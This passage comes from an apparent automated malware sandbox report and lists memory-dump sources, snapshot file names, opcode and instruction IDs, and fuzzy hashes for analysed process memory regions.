                                                                                                                                  • Opcode Fuzzy Hash: 0b4c53e263431580ff756790bcd6a7350b59d00c51635d8202f3020a5bb2b585
                                                                                                                                  • Instruction Fuzzy Hash: 3721C820B1DD1D0FE798B76C946A67972C6EBD8225F4102BAE40DC72E7DD589C428281
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a1894297477b64c5b1ab6776350249781b4f9bd3f7acc6414c721db264d6d844
                                                                                                                                  • Instruction ID: 6bb151378dbcd2ef19f9762d5d4237c8c45b235815426fa7884f8f4fb0875a07
                                                                                                                                  • Opcode Fuzzy Hash: a1894297477b64c5b1ab6776350249781b4f9bd3f7acc6414c721db264d6d844
                                                                                                                                  • Instruction Fuzzy Hash: BC11E131A0E28C8FE722DBA888700DD7FB0EF92611F4642F7D044DB2A2D9382649C784
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fbd615fc1cd92589393f636f84e948808f450f7c008ddf920202a0a3e33d3e87
                                                                                                                                  • Instruction ID: 71780355057a422a3d2c2cb3f89c129a1441ddaf7e1e7f16a4da7f98c49e3006
                                                                                                                                  • Opcode Fuzzy Hash: fbd615fc1cd92589393f636f84e948808f450f7c008ddf920202a0a3e33d3e87
                                                                                                                                  • Instruction Fuzzy Hash: 9901D231A0E38C8FE722DBA4C86049C7FB0EF82711F4642E7D054DB2A2D9386644C740
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2b8b05ac3a117527f4a16ef43bc26c25f2eec3995d145ce7952d1c3a69a9ee9a
                                                                                                                                  • Instruction ID: d3437d9690e84259a7f390c24ea36b5c9d79a8cbf8d10bbd52a707246784248b
                                                                                                                                  • Opcode Fuzzy Hash: 2b8b05ac3a117527f4a16ef43bc26c25f2eec3995d145ce7952d1c3a69a9ee9a
                                                                                                                                  • Instruction Fuzzy Hash: 3101BC30A0E3899FE722DBA4886449C7FB0EF52701F5542E7D054DB2A2D9786A44C744
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: c9$!k9$"s9
                                                                                                                                  • API String ID: 0-3426396564
                                                                                                                                  • Instruction ID: d7e3dd96e30b9d43b5d2dc38ed30cab640a7ab2438f1c62fc4c931b52efdf37b
                                                                                                                                  • Opcode Fuzzy Hash: 54b3bdfac85337088c07613df5ecb4cd6b6a46193c3aa62ab90cf3e95458920a
                                                                                                                                  • Instruction Fuzzy Hash: 93E01230F0D11E8AF774A755D8607B962629F94704F5600B5D40ED32E2DDB86F418A55
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0f4f05a223ffb7b3a8a748953fa134ab67674250fd60c56fd708e36b549a1ad9
                                                                                                                                  • Instruction ID: 39ae7c3307a973fb3895cf3b728150e803e3f5b97c6d35a82a3f5e8e7e55929d
                                                                                                                                  • Opcode Fuzzy Hash: 0f4f05a223ffb7b3a8a748953fa134ab67674250fd60c56fd708e36b549a1ad9
                                                                                                                                  • Instruction Fuzzy Hash: 7FC04C305218098FC994E76DC98595477A0FB0D215BD60190E44DC7171E65AADD5C741
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction ID: 15a2d76f2acc1e229c8467994c8db05a7fe7b6cb91a23be4982a98db52c93475
                                                                                                                                  • Opcode Fuzzy Hash: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction Fuzzy Hash: 5BC08C3051180D8FCA48EB28C88481433E0FB0D200FC20090E008C7170E269DCC0CB40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 04d398a4e3498b0c8f8e3e8d5efa6b2ea8f6cf5a71dc55b4f6a9dacd6834987d
                                                                                                                                  • Instruction ID: 13084b5f33aa7ef52ab2cf5f8ee66df761be9771b02429f150f67de6551731fe
                                                                                                                                  • Opcode Fuzzy Hash: 04d398a4e3498b0c8f8e3e8d5efa6b2ea8f6cf5a71dc55b4f6a9dacd6834987d
                                                                                                                                  • Instruction Fuzzy Hash: BFC08C01F0CC1A12F25922040821A7D08024F4471CF880034F10EC72CECE1C5A0202C6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction ID: ed2ad82ac794e93c54508d1dd081e88639fcab4bd9146968243794078dba2c1c
                                                                                                                                  • Opcode Fuzzy Hash: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction Fuzzy Hash: 2BB01200D5740F00E47433FA08A206870415B44200FC20070D40C8019198CE22980277
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2c95157bfa868442b5157fd24a56b21f4e885d199a0fec471ac2635aceea7b26
                                                                                                                                  • Instruction ID: 685052d591bc592c2d4a05fd945a0bacff3e97cd460aa81a7c177293ace483a3
                                                                                                                                  • Opcode Fuzzy Hash: 2c95157bfa868442b5157fd24a56b21f4e885d199a0fec471ac2635aceea7b26
                                                                                                                                  • Instruction Fuzzy Hash: 90E2B331B1991E4FEBA8EB5884B17B87392FFA8340F1545B9D01DC72E6DE64BD418B80
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: c9$!k9$"s9
                                                                                                                                  • API String ID: 0-3426396564
                                                                                                                                  • Opcode ID: 4470e08967ed613b296afce63408d3fd13e033ffe4afc30e5f06ef80efccf24c
                                                                                                                                  • Instruction ID: 686306be4a690df05e0852d15206d5b05897dfacf84590a8f7bf2564703c99ef
                                                                                                                                  • Opcode Fuzzy Hash: 4470e08967ed613b296afce63408d3fd13e033ffe4afc30e5f06ef80efccf24c
                                                                                                                                  • Instruction Fuzzy Hash: F801F73A3299568FC611AB3EA4905D8BB50EAC2135B8601B7D144CB1A1E2101C9EC7E0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: M
                                                                                                                                  • API String ID: 0-3664761504
                                                                                                                                  • Opcode ID: 44525fd575992261979def29f32153c51023dd10f9c9c0488f51a1c04dc62c1c
                                                                                                                                  • Instruction ID: 7e293e87847a447f948362c5c3ece842b633de5fd7d8e33c511a4712fe521cc2
                                                                                                                                  • Opcode Fuzzy Hash: 44525fd575992261979def29f32153c51023dd10f9c9c0488f51a1c04dc62c1c
                                                                                                                                  • Instruction Fuzzy Hash: BCE06561A4B3C44FCB19AA3484694547FA0EF6720174A51EEC056CB1A3DA1DD886C701
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: I
                                                                                                                                  • API String ID: 0-3707901625
                                                                                                                                  • Opcode ID: 13c6aa1613b8499ab9238997d5505ee02ed6a470e895d757e21e7158a1fdb2ff
                                                                                                                                  • Instruction ID: fccb1b65466546408b31dce473351bce6f264d883f64bf02282f478a91c1dddb
                                                                                                                                  • Opcode Fuzzy Hash: 13c6aa1613b8499ab9238997d5505ee02ed6a470e895d757e21e7158a1fdb2ff
                                                                                                                                  • Instruction Fuzzy Hash: 62E0126154E3C44FCB1AEB7488698943FA0AE6B21078B40EEC186CF2B3E62DC949C701
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: I
                                                                                                                                  • API String ID: 0-3707901625
                                                                                                                                  • Opcode ID: 16bedd60f9927a11fc93583c22fba363b9671931c9460c4d41c5cbc5bcca993f
                                                                                                                                  • Instruction ID: 1f362d40cfaea4c412d5ecdd6d446c27ddbaf54b2d03c6cf2260a80495f5ef28
                                                                                                                                  • Opcode Fuzzy Hash: 16bedd60f9927a11fc93583c22fba363b9671931c9460c4d41c5cbc5bcca993f
                                                                                                                                  • Instruction Fuzzy Hash: F9E01A7154E7C44FCB16EB74886A9547FA0AE6721078B40EFC189CF1B3E62D8949C701
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b130cf2201561112b9f141485a2afbfa11c512ddd28c307e44cfd3a1b4f8dd31
                                                                                                                                  • Instruction ID: 2599c1933beff627f96903d94bf2d4d83b9ba1447d24e197d4a445594907d896
                                                                                                                                  • Opcode Fuzzy Hash: b130cf2201561112b9f141485a2afbfa11c512ddd28c307e44cfd3a1b4f8dd31
                                                                                                                                  • Instruction Fuzzy Hash: 3042C231B1991E4FEBA8EB5884A177873D2FFA8350F1541B9D01DC32E7DE68AD428B41
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 22bc0298ca3ebabf706e3cee225c59192196607cf46dcbad4e5e976e778f4fa1
                                                                                                                                  • Instruction ID: f2993fc99124598a4dfecd4a24dd8da82dbd464b81e66647034af81fcac24a86
                                                                                                                                  • Opcode Fuzzy Hash: 22bc0298ca3ebabf706e3cee225c59192196607cf46dcbad4e5e976e778f4fa1
                                                                                                                                  • Instruction Fuzzy Hash: E771A272E19A4D8FE799DB6888657A87BE1FF99314F4101BAE05DD72EACB7428018700
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4c69d9a4ea49a09806f960972eb22d18c24aee97bfdf67355668450bf3ea8af0
                                                                                                                                  • Instruction ID: 4c7a5a7912c581b1dab60298dc614e5d9a2b7df14c3005a0818361cb141db788
                                                                                                                                  • Opcode Fuzzy Hash: 4c69d9a4ea49a09806f960972eb22d18c24aee97bfdf67355668450bf3ea8af0
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e518833da54e11cddcfe44cfb65d0bbfe3a6227a6b51b4ae153cc8461314605b
                                                                                                                                  • Instruction ID: 4929fa9a8e8ba247497b108c220b0c488c8901d046e331d6e67b1d87e26d4ff2
                                                                                                                                  • Opcode Fuzzy Hash: e518833da54e11cddcfe44cfb65d0bbfe3a6227a6b51b4ae153cc8461314605b
                                                                                                                                  • Instruction Fuzzy Hash: E0E01A7154E3C48FCB06EB7488A59443F60AE6B21078B41EEC145CF1B3E62D8849C701
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 54b3bdfac85337088c07613df5ecb4cd6b6a46193c3aa62ab90cf3e95458920a
                                                                                                                                  • Instruction ID: d7e3dd96e30b9d43b5d2dc38ed30cab640a7ab2438f1c62fc4c931b52efdf37b
                                                                                                                                  • Opcode Fuzzy Hash: 54b3bdfac85337088c07613df5ecb4cd6b6a46193c3aa62ab90cf3e95458920a
                                                                                                                                  • Instruction Fuzzy Hash: 93E01230F0D11E8AF774A755D8607B962629F94704F5600B5D40ED32E2DDB86F418A55
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 216e1789ede4c91f2940022da9cd7851c4a85a69f1e1107e36a7de21cda560c3
                                                                                                                                  • Instruction ID: c2b01c04f928777a0e668d230f27660419bee7da6d3b12f1bd017861ce245802
                                                                                                                                  • Opcode Fuzzy Hash: 216e1789ede4c91f2940022da9cd7851c4a85a69f1e1107e36a7de21cda560c3
                                                                                                                                  • Instruction Fuzzy Hash: 5DE04F2154F3C04FC70B973088A88803F60DE2721034A40EAC145CF2B3E5298C49C711
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 766aa0ce932918cdde308f6c22499ebc45b7553adf3843164fdbfc272c49b119
                                                                                                                                  • Instruction ID: 7a5d4e4c5c284cae1d0a98378bbaddce979002e6a2a82d53d0b2d228632deb92
                                                                                                                                  • Opcode Fuzzy Hash: 766aa0ce932918cdde308f6c22499ebc45b7553adf3843164fdbfc272c49b119
                                                                                                                                  • Instruction Fuzzy Hash: 23E0462294F3C44FC70B9B3088A88803F60DE6B21038A40EAC185CF2B3EA298C49C712
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b292142cf82a915c0d3309af083262191a7af86752a03255b8b08ca59009f910
                                                                                                                                  • Instruction ID: 4d42b7d0be3b109485a70965e459ddfeee3832af35be1ad3ca96cb3282065b1d
                                                                                                                                  • Opcode Fuzzy Hash: b292142cf82a915c0d3309af083262191a7af86752a03255b8b08ca59009f910
                                                                                                                                  • Instruction Fuzzy Hash: FAD0121271E86D4AB1A8B2EC38622FC93C2EBCC135B5953F7E11CC63DADC4A598302C5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                                  • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                                  • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                                  • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c6f8a706cbd772b155944279ffe8a3f2cffa48fa2b7bee167bf78b64a5f12c82
                                                                                                                                  • Instruction ID: b32eab7c9bc4b7e74645761e53194022764afd2861dcc3217c0a303523c631e1
                                                                                                                                  • Opcode Fuzzy Hash: c6f8a706cbd772b155944279ffe8a3f2cffa48fa2b7bee167bf78b64a5f12c82
                                                                                                                                  • Instruction Fuzzy Hash: 07D02230B508040FCB0CA738885C8303390EBAA20278600A8D00AC73B1D96ADC88CB80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6c041862a73e2b6de475868b410abd7f4c78647bddf8e74da7c7540c1417e78f
                                                                                                                                  • Instruction ID: 581286378855cb50aceae6a2764fc65d1805fc2fadc41a54a20cd815604572da
                                                                                                                                  • Opcode Fuzzy Hash: 6c041862a73e2b6de475868b410abd7f4c78647bddf8e74da7c7540c1417e78f
                                                                                                                                  • Instruction Fuzzy Hash: 81E08C32E0440E4BEB18EF88C460AFD3BF5AF48304F00013AE029E62E5DE7428814B00
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d34d9375b611b996318a395ba4af66737237af83ea357c991f98737d4e71250a
                                                                                                                                  • Instruction ID: 693cc6325eff473f90e08535aeacc7b152b97be437aed018cb3775b3459b9de1
                                                                                                                                  • Opcode Fuzzy Hash: d34d9375b611b996318a395ba4af66737237af83ea357c991f98737d4e71250a
                                                                                                                                  • Instruction Fuzzy Hash: DDD0A730F0881F4BE659EF48946426A6251FF44300F120039D81DC3167DE34E9118A40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0f4f05a223ffb7b3a8a748953fa134ab67674250fd60c56fd708e36b549a1ad9
                                                                                                                                  • Instruction ID: 39ae7c3307a973fb3895cf3b728150e803e3f5b97c6d35a82a3f5e8e7e55929d
                                                                                                                                  • Opcode Fuzzy Hash: 0f4f05a223ffb7b3a8a748953fa134ab67674250fd60c56fd708e36b549a1ad9
                                                                                                                                  • Instruction Fuzzy Hash: 7FC04C305218098FC994E76DC98595477A0FB0D215BD60190E44DC7171E65AADD5C741
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction ID: 15a2d76f2acc1e229c8467994c8db05a7fe7b6cb91a23be4982a98db52c93475
                                                                                                                                  • Opcode Fuzzy Hash: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction Fuzzy Hash: 5BC08C3051180D8FCA48EB28C88481433E0FB0D200FC20090E008C7170E269DCC0CB40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6d37d5abdadc2e2e799eb191ad3f1425ddb310326d155c93511a588fff0db703
                                                                                                                                  • Instruction ID: bdd98c863e0162ae75f8e14699de8453af00b9b37c7f4702c9b7186f81107286
                                                                                                                                  • Opcode Fuzzy Hash: 6d37d5abdadc2e2e799eb191ad3f1425ddb310326d155c93511a588fff0db703
                                                                                                                                  • Instruction Fuzzy Hash: 64C092306118088FCA44FB7DC88994037E0FB0E205BC50080E40CCB270E26A9C96CB41
                                                                                                                                  Memory Dump Source
